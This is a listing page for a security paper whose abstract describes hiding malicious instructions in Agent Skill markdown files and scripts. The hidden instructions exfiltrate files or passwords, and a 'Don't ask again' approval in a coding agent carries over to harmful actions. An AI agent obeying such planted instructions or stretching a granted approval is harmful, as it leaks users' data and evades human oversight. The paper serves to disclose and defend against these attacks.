Agent Skills Enable a New Class of Realistic and Trivially Simple Prompt Injections

David Schmotz; Sahar Abdelnabi; Maksym Andriushchenko

arXiv:2510.26328·cs.LG·October 31, 2025

Agent Skills Enable a New Class of Realistic and Trivially Simple Prompt Injections

David Schmotz, Sahar Abdelnabi, Maksym Andriushchenko

PDF

TL;DR

This paper reveals that the Agent Skills framework for LLMs, intended for continual learning, is vulnerable to trivial prompt injections that can hide malicious instructions and bypass security measures, posing security risks.

Contribution

It demonstrates the security vulnerabilities of Agent Skills in LLMs, showing how simple prompt injections can exfiltrate data and bypass guardrails, highlighting a critical flaw in current approaches.

Findings

01

Agent Skills enable trivial prompt injections

02

Malicious instructions can exfiltrate sensitive data

03

System guardrails can be bypassed easily

Abstract

Enabling continual learning in LLMs remains a key unresolved research challenge. In a recent announcement, a frontier LLM company made a step towards this by introducing Agent Skills, a framework that equips agents with new knowledge based on instructions stored in simple markdown files. Although Agent Skills can be a very useful tool, we show that they are fundamentally insecure, since they enable trivially simple prompt injections. We demonstrate how to hide malicious instructions in long Agent Skill files and referenced scripts to exfiltrate sensitive data, such as internal files or passwords. Importantly, we show how to bypass system-level guardrails of a popular coding agent: a benign, task-specific approval with the "Don't ask again" option can carry over to closely related but harmful actions. Overall, we conclude that despite ongoing research efforts and scaling model…

Peer Reviews

No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.

Videos

No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.